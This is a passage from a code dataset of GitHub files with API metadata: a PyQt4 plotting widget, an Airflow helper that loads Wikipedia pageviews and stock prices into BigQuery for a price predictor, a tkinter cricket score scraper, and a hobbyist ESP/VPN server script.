1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "keras.callbacks.ModelCheckpoint", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 40, "usage_type": "call"}, {"api_name": "lifelines.utils.concordance_index", "line_number": 41, "usage_type": "call"}, {"api_name": "models.base.BaseModel", "line_number": 61, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 70, "usage_type": "name"}, {"api_name": "keras.backend.get_session", "line_number": 75, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 75, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 80, "usage_type": "name"}, {"api_name": "numpy.argsort", "line_number": 97, "usage_type": "call"}, {"api_name": "keras.backend.exp", "line_number": 104, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 104, "usage_type": "name"}, {"api_name": "keras.backend.log", "line_number": 105, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 105, "usage_type": "name"}, {"api_name": "keras.backend.cumsum", "line_number": 105, "usage_type": "call"}, {"api_name": "keras.backend.transpose", "line_number": 106, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 106, "usage_type": "name"}, {"api_name": "keras.backend.sum", "line_number": 108, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 108, "usage_type": "name"}, {"api_name": "keras.optimizers.Adam", "line_number": 121, "usage_type": "call"}, {"api_name": "keras.optimizers", "line_number": 121, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 133, "usage_type": "call"}, {"api_name": "lifelines.utils.concordance_index", "line_number": 134, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 148, "usage_type": "call"}, {"api_name": "lifelines.utils.concordance_index", "line_number": 149, "usage_type": "call"}, {"api_name": "keras.backend.clear_session", "line_number": 151, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 151, "usage_type": "name"}]}
+{"seq_id": "30868743889", "text": "from PyQt4 import QtGui, QtCore\nfrom diagramme_compo import *\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas\n#from matplotlib.backends.backend_qt4agg import NavigationToolbar2QTAgg as NavigationToolbar\nfrom matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar\nimport matplotlib.pyplot as plt\nimport matplotlib\n\nclass DiagrammeCompoWidget(QtGui.QWidget):\n def __init__(self,\n compo,\n compo2=None,\n fatigue=True,\n parent=None,\n nom_1=None,\n nom_2=None):\n super(DiagrammeCompoWidget, self).__init__(parent)\n self.compo = compo\n self.compo2 = compo2\n self.nom_1 = nom_1\n self.nom_2 = nom_2\n self.fatigue = fatigue\n\n self.lay = QtGui.QVBoxLayout()\n self.setLayout(self.lay)\n\n self.plot()\n\n def plot(self):\n #self.fig = plt.figure()\n #self.ax = self.fig.add_subplot(111)\n self.fig = plt.gcf()\n self.ax = plt.gca()\n self.canvas = FigureCanvas(self.fig)\n self.lay.addWidget(self.canvas)\n plt.axis('off')\n plt.close(self.fig)\n\n diagramme_etoile_compo(self.compo,\n fatigue=self.fatigue,\n ax=self.ax,\n compo2=self.compo2,\n nom_1=self.nom_1,\n nom_2=self.nom_2)\n", "repo_name": "ClementChardin/Test", "sub_path": "ui/diagramme_compo_widget.py", "file_name": "diagramme_compo_widget.py", "file_ext": "py", "file_size_in_byte": 1492, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyQt4.QtGui.QWidget", "line_number": 9, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 9, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QVBoxLayout", "line_number": 24, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_qt4agg.FigureCanvasQTAgg", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}]}
+{"seq_id": "24119030905", "text": "from urllib import request\nimport datetime\nimport requests\nfrom bs4 import BeautifulSoup\nimport pytz\nfrom google.cloud import bigquery\nimport os\nimport sys\nfrom dotenv import load_dotenv\nimport pandas as pd\nimport json\nfrom yahoo_fin import stock_info as si\nfrom airflow.exceptions import AirflowException\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestRegressor\n\n# Load env variables from .env\nload_dotenv()\n\n# Grab AIRFLOW_HOME env variable\nAIRFLOW_HOME = os.getenv('AIRFLOW_HOME')\n\n# Add airflow to sys.path\nsys.path.append(AIRFLOW_HOME)\n\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = '/opt/airflow/config/ServiceKey_GoogleCloud.json'\n\n#### ####\n#### Helper Functions For load_pageviews.py ####\n#### ####\n\ndef get_latest_url(base_url = 'https://dumps.wikimedia.org/other/pageviews/'):\n '''\n Function: get_latest_url\n Summary: Get the latest url for the pageviews\n Args:\n base_url (str): Base url for the pageviews\n Returns:\n latest_url (str): Latest url for the pageviews\n Example of latest url: \n https://dumps.wikimedia.org/other/pageviews/2021/2021-06/\n '''\n # Set timezone to GMT\n tz = pytz.timezone('GMT')\n\n # Grab current year and month and generate latest url\n year = str(datetime.datetime.now(tz).year)\n month = '0' + str(datetime.datetime.now(tz).month)\n latest_url = f'{base_url}{(year)}/{(year)}-{month}/'\n return latest_url\n\ndef get_latest_link():\n '''\n Function: get_latest_link\n Summary: Get the latest link for the pageviews\n Args:\n latest_url (str): Latest url for the pageviews\n Returns:\n latest_link (str): Latest link for the pageviews\n Example of latest link:\n pageviews-20210619-170000.gz\n '''\n # Grab latest url and parse it using BeautifulSoup\n latest_url = get_latest_url()\n response = requests.get(latest_url)\n soup = BeautifulSoup(response.text, \"html.parser\")\n\n return [link.text for link in soup.find_all('a') if 'pageviews' in str(link)][-1]\n\n\ndef generate_curl_command():\n '''\n Function: generate_curl_command\n Summary: Generate curl command to download the latest pageviews\n Args:\n None\n Returns:\n curl_command (str): Curl command to download the latest pageviews\n Notes:\n The curl command will be used in the BashOperator\n Example: curl -o /tmp/wikipageviews.gz https://dumps.wikimedia.org/other/pageviews/2021/2021-06/projectviews-20210619-170000.gz\n '''\n # Generate the latest_link\n latest_url = get_latest_url()\n latest_link = get_latest_link()\n\n # Return curl command\n curl_command = f'curl -o /tmp/wikipageviews.gz {latest_url}{latest_link}'\n return curl_command\n\ndef generate_unzip_command():\n return 'gunzip --force /tmp/wikipageviews.gz'\n\n\ndef _fetch_pageviews(pagenames):\n '''\n Function: _fetch_pageviews\n Summary: Fetch pageviews for a given list of pagenames and export as csv\n Args:\n pagenames (list): List of pagenames\n Returns:\n None\n Notes:\n Example of csv file:\n Google, 100\n Amazon, 200\n Apple, 300\n '''\n def export_as_csv(result):\n latest_link = get_latest_link()\n with open(f\"/tmp/{latest_link}.csv\", 'w') as write_file:\n write_file.write(str(result))\n write_file.close()\n\n # Load pagenames into a dict\n result = dict.fromkeys(pagenames, 0)\n\n # Iterate through each line and extract the pageviews for each pagenames\n with open(f\"/tmp/wikipageviews\", \"r\") as f:\n for line in f:\n domain_code, page_title, view_counts, _ = line.split(\" \")\n if domain_code == \"en\" and page_title in pagenames:\n result[page_title] = view_counts\n f.close()\n \n # Print result and export as csv\n print(result)\n export_as_csv(result)\n\ndef connect_to_bigquery():\n '''\n Function: connect_to_bigquery\n Summary: Connect to BigQuery\n Args:\n None\n Returns:\n conn (obj): BigQuery connection object\n '''\n conn = bigquery.Client()\n return conn\n\ndef grab_table_id(conn, table_name, service_key_path='/opt/airflow/config/ServiceKey_GoogleCloud.json'):\n '''\n Function: grab_table_id\n Summary: Grab table id\n Args:\n conn (obj): BigQuery connection object\n Returns:\n table_id (str): Table id\n Template for table id:\n ProjectName.Datasetname.Tablename\n '''\n # Grab project name from service account json file\n project = conn.from_service_account_json(service_key_path).project\n \n # Generate and return table id\n dataset = conn.get_dataset('pageviews')\n table_id = f'{project}.{dataset.dataset_id}.{table_name}'\n return table_id\n\n\ndef today_date_from_latest_link():\n '''\n Function: today_date_from_latest_link\n Summary: Get the latest link available on https://dumps.wikimedia.org/other/pageviews/\n Args:\n None\n Returns:\n date (obj): Today's date\n '''\n latest_link = get_latest_link()\n latest_link = latest_link.replace(\"pageviews-\", \"\")[:-3]\n date = pd.to_datetime(latest_link, format='%Y%m%d-%H%M%S')\n return date\n\ndef _load_data():\n '''\n Function: _load_data\n Summary: \n - Convert csv file with pageviews to pandas dataframe\n - Generate a dataframe for the pageviews\n - Load the dataframe to BigQuery\n Args:\n None\n Returns:\n None\n '''\n\n # Grab latest link\n latest_link = get_latest_link()\n\n # Read csv file\n with open(f\"/tmp/{latest_link}.csv\", 'r') as read_file:\n # convert string - {'Apple': 0, 'Microsoft': 0, 'Facebook': 0, 'Google': 0, 'Amazon': 0} to dict\n new_string = ''\n for i in read_file.read():\n if i == \"'\":\n i = i.replace(\"'\", '\"')\n new_string += i # Generating a new string with double quotes\n df = json.loads(new_string) # Converting string to dict\n read_file.close()\n\n # Connect to BigQuery and grab table id\n conn = connect_to_bigquery()\n table_id = grab_table_id(conn, table_name='pageviews')\n\n date = today_date_from_latest_link()\n\n # Generate a Pandas dataframe from the dict\n df = pd.DataFrame(df.items(), columns=[\"company\", \"views\"])\n df['views'] = df['views'].astype('int64')\n df['date'] = date\n\n # Generate job config. Specify schema and write disposition\n job_config = bigquery.LoadJobConfig(\n schema=[\n bigquery.SchemaField(\"company\", bigquery.enums.SqlTypeNames.STRING, mode=\"REQUIRED\"),\n bigquery.SchemaField(\"views\", bigquery.enums.SqlTypeNames.INTEGER, mode=\"NULLABLE\"),\n bigquery.SchemaField(\"date\", bigquery.enums.SqlTypeNames.DATETIME, mode=\"REQUIRED\"),\n ],\n write_disposition=\"WRITE_APPEND\",\n )\n\n # Load data into BigQuery\n job = conn.load_table_from_dataframe(df, table_id, job_config=job_config)\n job.result()\n print(\"Loaded {} rows into {}.\".format(job.output_rows, table_id))\n\ndef grab_latest_link_from_bigquery():\n '''\n Function: grab_latest_link_from_bigquery\n Summary: Grab latest link from BigQuery\n Args:\n None\n Returns:\n latest_link (str): Latest link\n Format of latest link: 2023-06-28T04:00:00.000000000\n '''\n conn = connect_to_bigquery()\n table_id = grab_table_id(conn, table_name='pageviews')\n query = f\"\"\"\n SELECT max(date) as date\n FROM `{table_id}`\n \"\"\"\n query_job = conn.query(query)\n results = query_job.result().to_dataframe()\n results = results['date'].values[0]\n\n return results\n\ndef is_new_data_is_available():\n '''\n Function: check_if_new_data_is_available\n Summary: \n - Check if new data is available by comparing the latest link from BigQuery and the latest link from Wikipedia\n - If the latest link from Wikipedia is newer than the latest link from BigQuery, return True\n - Else, return False\n Args:\n None\n Returns:\n True or False (bool): True if new data is available, False otherwise\n '''\n # Grab date from latest link from BigQuery. If no data is available, return True\n try:\n latest_link_from_bigquery = grab_latest_link_from_bigquery()\n latest_link_from_bigquery = pd.to_datetime(latest_link_from_bigquery)\n except:\n return True\n\n # Grab date from latest link from Wikipedia\n latest_link_from_wikipedia = get_latest_link()\n latest_link_from_wikipedia = latest_link_from_wikipedia.replace(\"pageviews-\", \"\")[:-3]\n latest_link_from_wikipedia = pd.to_datetime(latest_link_from_wikipedia, format='%Y%m%d-%H%M%S')\n\n print(f\"Latest link from Wikipedia: {latest_link_from_wikipedia}\")\n print(f\"Latest link from BigQuery: {latest_link_from_bigquery}\")\n\n # Compare dates\n if latest_link_from_wikipedia > latest_link_from_bigquery:\n return True\n else:\n print(\"Data is up to date.\")\n raise AirflowException(\"Data is up to date.\")\n\ndef grab_current_rates():\n '''\n Function: grab_current_rates\n Summary:\n - Grab current rates for several companies using yahoo_fin\n - Generate a Pandas dataframe\n Args:\n None\n Returns:\n df (obj): Pandas dataframe \n '''\n quotes = ['META', 'AMZN', 'GOOGL', 'MSFT', 'AAPL']\n rates = {}\n \n # Grab rates\n for quote in quotes:\n rates[quote] = si.get_live_price(quote)\n\n df = pd.DataFrame(rates.items(), columns=['company', 'rate'])\n return df\n\ndef generate_rates_dataframe():\n '''\n Function: generate_rates_dataframe\n Summary: Generate rates dataframe\n Args:\n None\n Returns:\n df (obj): Pandas dataframe\n '''\n df = grab_current_rates()\n df['rate'] = df['rate'].astype(\"float64\")\n\n current_date = today_date_from_latest_link()\n df['date'] = current_date\n return df\n\ndef load_current_rates():\n '''\n Function: load_current_rates\n Summary: \n - Generate rates dataframe\n - Load rates dataframe into BigQuery\n Args:\n None\n Returns:\n None\n '''\n\n df = generate_rates_dataframe()\n conn = connect_to_bigquery()\n table_id = grab_table_id(conn, table_name='rates')\n\n # Generate job config. Specify schema and write disposition\n job_config = bigquery.LoadJobConfig(\n schema=[\n bigquery.SchemaField(\"company\", bigquery.enums.SqlTypeNames.STRING, mode=\"REQUIRED\"),\n bigquery.SchemaField(\"rate\", bigquery.enums.SqlTypeNames.FLOAT, mode=\"NULLABLE\"),\n bigquery.SchemaField(\"date\", bigquery.enums.SqlTypeNames.DATETIME, mode=\"REQUIRED\"),\n ],\n write_disposition=\"WRITE_APPEND\",\n )\n\n # Load data into BigQuery\n job = conn.load_table_from_dataframe(df, table_id, job_config=job_config)\n job.result()\n print(\"Loaded {} rows into {}.\".format(job.output_rows, table_id))\n\n\n#### ####\n#### Helper Functions For predict_rates.py ####\n#### ####\n\ndef pre_processing() -> pd.DataFrame:\n '''\n Function: pre_processing\n Summary:\n - Connect to bigquery and grab ALL data\n - seperate date column\n Args:\n None\n Returns:\n pageviews_df(dataframe)\n '''\n # Generate dataframe with ALL data from bigquery\n conn = connect_to_bigquery()\n query = \"SELECT * FROM pageviews-390416.pageviews.pageviews_ranks\"\n pageviews_df = conn.query(query).result().to_dataframe()\n \n # Seperate and drop date column\n pageviews_df['year'] = pd.to_datetime(pageviews_df['date']).dt.year\n pageviews_df['month'] = pd.to_datetime(pageviews_df['date']).dt.month\n pageviews_df['day'] = pd.to_datetime(pageviews_df['date']).dt.day\n pageviews_df['hour'] = pd.to_datetime(pageviews_df['date']).dt.hour\n pageviews_df['minute'] = pd.to_datetime(pageviews_df['date']).dt.minute\n pageviews_df['second'] = pd.to_datetime(pageviews_df['date']).dt.second\n pageviews_df = pageviews_df.drop(['date'], axis=1)\n\n return pageviews_df\n\ndef train_test_samples(x, y, test_size = 0.2):\n number_of_test_rows = int(len(x) * test_size)\n\n x_train = x.iloc[number_of_test_rows:,:].values\n x_test = x.iloc[:number_of_test_rows, :].values\n\n y_train = y[number_of_test_rows:].values\n y_test = y[:number_of_test_rows].values\n \n return x_train, y_train, x_test, y_test\n\ndef generate_x_y(df, company):\n company_df = df[df.company == company]\n x = company_df.drop(['rate' ,'company'], axis = 1)\n y = company_df.loc[:, 'rate']\n return x, y\n\ndef train_model(df, company):\n '''\n Function: train_model\n Summary:\n - Create train and test data from ALL data\n - Train and test model\n Args:\n df - dataframe with ALL data\n company - name of assert\n Returns:\n model(RanomForestRegressor model)\n '''\n # Create train and test data for each company(80% train, 20% test)\n x, y = generate_x_y(df, company)\n x_train, y_train, x_test, y_test = train_test_samples(x, y)\n\n # Train a RandomForest model\n model = RandomForestRegressor(n_estimators=50, random_state = 365)\n model.fit(x_train, y_train)\n\n # Print score\n print(f\"Model R^2 Score is: {model.score(x_test, y_test)}\")\n\n return model \n\ndef generate_new_data(company, date:pd.DatetimeIndex, pageviews:int) -> pd.DataFrame:\n '''\n Function: generate_new_data\n Summary:\n - Generate a dataframe with the views from the last hour\n - dataframe will have exactly the same format as the train dataframe\n - dataframe date will be one hour after the latest date in bigquery\n Args:\n company - name of assert\n date - latest date from bigquery\n pageviews - latest views from bigquery\n Returns:\n new_data_df(dataframe) \n '''\n new_data_df = pd.DataFrame()\n date = pd.to_datetime(date)\n\n new_data_df['pageviews'] = [pageviews]\n new_data_df['year'] = [date.year]\n new_data_df['month'] = [date.month]\n new_data_df['day'] = [date.day]\n new_data_df['hour'] = [date.hour+1]\n new_data_df['minute'] = [date.minute]\n new_data_df['second'] = [date.second]\n \n return new_data_df\n\ndef _predict_rates() -> pd.DataFrame:\n '''\n Function predict_rates()\n Summary:\n - Train model and predict new data for each company\n - Generate a dataframe for all next hour predictions\n Args:\n None\n Returns:\n predictions_df(dataframe)\n '''\n\n # Generate dataframe with ALL data from bigquery\n df = pre_processing()\n\n # Create dataframe for predictions\n predictions_df = pd.DataFrame()\n\n # For each company in the list predict the next hour rate\n for company in ['AMZN', 'GOOGL', 'META', 'MSFT', 'AAPL']:\n company_df = df[df[\"company\"] == company]\n \n # Get the latest date from bigquery\n date = grab_latest_link_from_bigquery()\n\n # generate new data for the next hour\n new_data = generate_new_data(company, date, company_df.views.values[-1])\n print(new_data)\n\n # Train model and predict new data\n model = train_model(company_df, company)\n prediction = model.predict(new_data)\n print(prediction)\n\n # Add prediction to dataframe\n predictions_df[company] = prediction\n\n # Export to csv\n predictions_df.to_csv('/tmp/predictions.csv', index=False)\n\ndef _generate_predictions_view():\n '''\n Function: generate_predictions_view\n Summary:\n - Generate a view with the predictions for the next hour\n Args:\n predictions_df(dataframe)\n Returns:\n None\n '''\n predictions_df = pd.read_csv('/tmp/predictions.csv')\n\n # Connect to bigquery\n conn = connect_to_bigquery()\n\n # Create dataframe for the view\n predictions_view_df = pd.DataFrame()\n predictions_view_df['current_AMZN'] = si.get_live_price(\"AMZN\")\n predictions_view_df['predicted_AMZN'] = predictions_df['AMZN']\n predictions_view_df['current_GOOGL'] = si.get_live_price(\"GOOGL\")\n predictions_view_df['predicted_GOOGL'] = predictions_df['GOOGL']\n predictions_view_df['current_META'] = si.get_live_price(\"META\")\n predictions_view_df['predicted_META'] = predictions_df['META']\n predictions_view_df['current_MSFT'] = si.get_live_price(\"MSFT\")\n predictions_view_df['predicted_MSFT'] = predictions_df['MSFT']\n predictions_view_df['current_AAPL'] = si.get_live_price(\"AAPL\")\n predictions_view_df['predicted_AAPL'] = predictions_df['AAPL']\n predictions_view_df['date'] = pd.to_datetime(grab_latest_link_from_bigquery())\n\n # Create view\n table_id = grab_table_id(conn=conn, service_key_path=\"/opt/airflow/config/ServiceKey_GoogleCloud.json\", table_name=\"predictions\")\n table = conn.get_table(table_id)\n conn.delete_table(table_id)\n job = conn.load_table_from_dataframe(predictions_view_df, table_id)\n job.result()\n\n print(\"Loaded {} rows into {}.\".format(job.output_rows, table_id))\n\n\n\ndef main():\n test_df = pre_processing()\n x, y = generate_x_y(test_df, 'GOOGL')\n x_train, y_train, x_test, y_test = train_test_samples(x, y)\n\n test_model = train_model(test_df, 'GOOGL')\n predictions_df = _predict_rates()\n #_generate_predictions_view(predictions_df)\n\nif __name__ == '__main__':\n main()\n\n\n", "repo_name": "bardadon/stock_pageviews", "sub_path": "airflow/helper/helper.py", "file_name": "helper.py", "file_ext": "py", "file_size_in_byte": 17388, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 18, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 21, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 24, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pytz.timezone", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 47, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 65, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 66, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.Client", "line_number": 139, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 139, "usage_type": "name"}, {"api_name": "pandas.to_datetime", "line_number": 173, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 200, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 210, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.LoadJobConfig", "line_number": 215, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 215, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.SchemaField", "line_number": 217, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 217, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.enums", "line_number": 217, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.SchemaField", "line_number": 218, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 218, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.enums", "line_number": 218, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.SchemaField", "line_number": 219, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 219, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.enums", "line_number": 219, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 266, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 273, "usage_type": "call"}, {"api_name": "airflow.exceptions.AirflowException", "line_number": 283, "usage_type": "call"}, {"api_name": "yahoo_fin.stock_info.get_live_price", "line_number": 301, "usage_type": "call"}, {"api_name": "yahoo_fin.stock_info", "line_number": 301, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 303, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.LoadJobConfig", "line_number": 339, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 339, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.SchemaField", "line_number": 341, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 341, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.enums", "line_number": 341, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.SchemaField", "line_number": 342, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 342, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.enums", "line_number": 342, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.SchemaField", "line_number": 343, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 343, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.enums", "line_number": 343, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 375, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 376, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 377, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 378, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 379, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 380, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 358, "usage_type": "attribute"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 419, "usage_type": "call"}, {"api_name": "pandas.DatetimeIndex", "line_number": 427, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 441, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 442, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 427, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 470, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 454, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 504, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 510, "usage_type": "call"}, {"api_name": "yahoo_fin.stock_info.get_live_price", "line_number": 511, "usage_type": "call"}, {"api_name": "yahoo_fin.stock_info", "line_number": 511, "usage_type": "name"}, {"api_name": "yahoo_fin.stock_info.get_live_price", "line_number": 513, "usage_type": "call"}, {"api_name": "yahoo_fin.stock_info", "line_number": 513, "usage_type": "name"}, {"api_name": "yahoo_fin.stock_info.get_live_price", "line_number": 515, "usage_type": "call"}, {"api_name": "yahoo_fin.stock_info", "line_number": 515, "usage_type": "name"}, {"api_name": "yahoo_fin.stock_info.get_live_price", "line_number": 517, "usage_type": "call"}, {"api_name": "yahoo_fin.stock_info", "line_number": 517, "usage_type": "name"}, {"api_name": "yahoo_fin.stock_info.get_live_price", "line_number": 519, "usage_type": "call"}, {"api_name": "yahoo_fin.stock_info", "line_number": 519, "usage_type": "name"}, {"api_name": "pandas.to_datetime", "line_number": 521, "usage_type": "call"}]}
+{"seq_id": "17359047519", "text": "from tkinter import *\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\n\r\nroot =Tk()\r\n\r\nurl = \"https://www.cricbuzz.com/\"\r\n\r\ntitle = Label(root, text='IPl', font=(\"Haveltica 30 bold\"))\r\ntitle.grid(row=1, padx=5)\r\nroot.title('IPL')\r\n\r\nteams = Label(root, font=(\"Haveltica 20 bold\"))\r\nteams.grid(row=1, padx=5)\r\n\r\nscores = Label(root, font=(\"Haveltica 20 bold\"))\r\nscores.grid(row=2, padx=5)\r\n\r\ndef get_score():\r\n page = requests.get(url)\r\n soup = BeautifulSoup(page.text,'html.parser')\r\n team_1 = soup.find_all(class_ =\"cb-ovr-flo cb-hmscg-tm-nm\")[0].get_text()\r\n team_2 = soup.find_all(class_ =\"cb-ovr-flo cb-hmscg-tm-nm\")[1].get_text()\r\n\r\n team_1_score = soup.find_all(class_=\"cb-ovr-flo\")[8].get_text()\r\n team_2_score = soup.find_all(class_=\"cb-ovr-flo\")[10].get_text()\r\n\r\n teams.config(text=f\"{team_1}\\t\\t{team_2}\")\r\n scores.config(text=f\"{team_1_score}\\t{team_2_score}\")\r\n\r\n scores.after(1000,get_score)\r\n\r\n\r\n\r\n\r\n\r\n get_score()\r\n root.mainloop()", "repo_name": "farhanibne/ipl_py", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 980, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 20, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 21, "usage_type": "call"}]}
+{"seq_id": "9393260742", "text": "# Very bad ESP server implementation\n\nfrom Crypto.Cipher import AES\nfrom Crypto.Hash import SHA256, HMAC\nfrom socket import socket, AF_INET6, SOCK_RAW, SOCK_DGRAM, IPPROTO_ESP\nfrom socket import *\nfrom threading import Thread\nfrom time import sleep\n\nimport os\n\nfrom classes import *\nfrom consts import *\n\ns: socket = None\nthing = {} # idi: [q, a, k, idr, ikeid]\n\n\ndef recv(id):\n\twhile len(thing[id]['q']) == 0:\n\t\tsleep(0.1)\n\treturn thing[id]['q'].pop(0)\n\n\ndef handle(id):\n\ts = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)\n\ts.bind((\"0.0.0.0\", 0))\n\twhile True:\n\t\tbuf = recv(id)\n\t\tiv = buf[8:24]\n\t\tenc = buf[24:-32]\n\t\ticv = buf[-32:]\n\t\t# Decrypt\n\t\tcipher = AES.new(thing[id]['ek'], AES.MODE_CBC, iv)\n\t\tdec = cipher.decrypt(enc)\n\t\ts.sendto(dec, (\"1.1.1.1\", 0))\n\ndef handle_catch(id):\n\ttry:\n\t\thandle(id)\n\texcept ESPException as e:\n\t\tif len(e.args[0]) == 2:\n\t\t\tn = NotifyPayload(*e.args[0])\n\t\telse:\n\t\t\tn = NotifyPayload(e.args[0][0], b'')\n\t\tif len(thing[id][2]):\n\t\t\tn = EncryptedPayload(id, [n])\n\t\tnm = Message(id, e.args[1], e.args[2], True, False, [n]).build()\n\t\tmisoq.append((nm, thing[id]['a']))\n\tprint(\"deleting\")\n\tdel thing[id]\n\ndef main(misoq_in, mosiq_in, _):\n\tglobal s, misoq, mosiq\n\tif os.getuid():\n\t\ts = socket(AF_INET6, SOCK_DGRAM)\n\t\ts.bind((\"::\", 5000))\n\telse:\n\t\ts = socket(AF_INET, SOCK_RAW, IPPROTO_ESP)\n\ts.setblocking(0)\n\tmisoq, mosiq = misoq_in, mosiq_in\n\n\twhile True:\n\t\ttry:\n\t\t\tfor msg in mosiq:\n\t\t\t\tprint('recieved msg')\n\t\t\t\tthing[msg['ispi']] = {'q': [], 'a': None, 'ek': msg['ek'], 'ak': msg['ak'], 'idr': msg['rspi'], 'ikeid': msg['id']}\n\t\t\t\tThread(target=handle_catch, args=(msg['ispi'],), daemon=True).start()\n\t\t\tfor i in range(len(mosiq)):\n\t\t\t\tmosiq.pop()\n\t\t\tbuf, a = s.recvfrom(65535)\n\t\t\tbuf = buf[20:]\n\t\t\tid = buf[:4]\n\t\t\tif id in thing:\n\t\t\t\t# Append to existing queue\n\t\t\t\tthing[id]['q'].append(buf)\n\t\t\t\tthing[id]['a'] = a\n\t\texcept BlockingIOError: sleep(0.01)\n", "repo_name": "wdotmathree/VPN", "sub_path": "esp.py", "file_name": "esp.py", "file_ext": "py", "file_size_in_byte": 1875, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "socket.socket", "line_number": 15, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 21, "usage_type": "call"}, 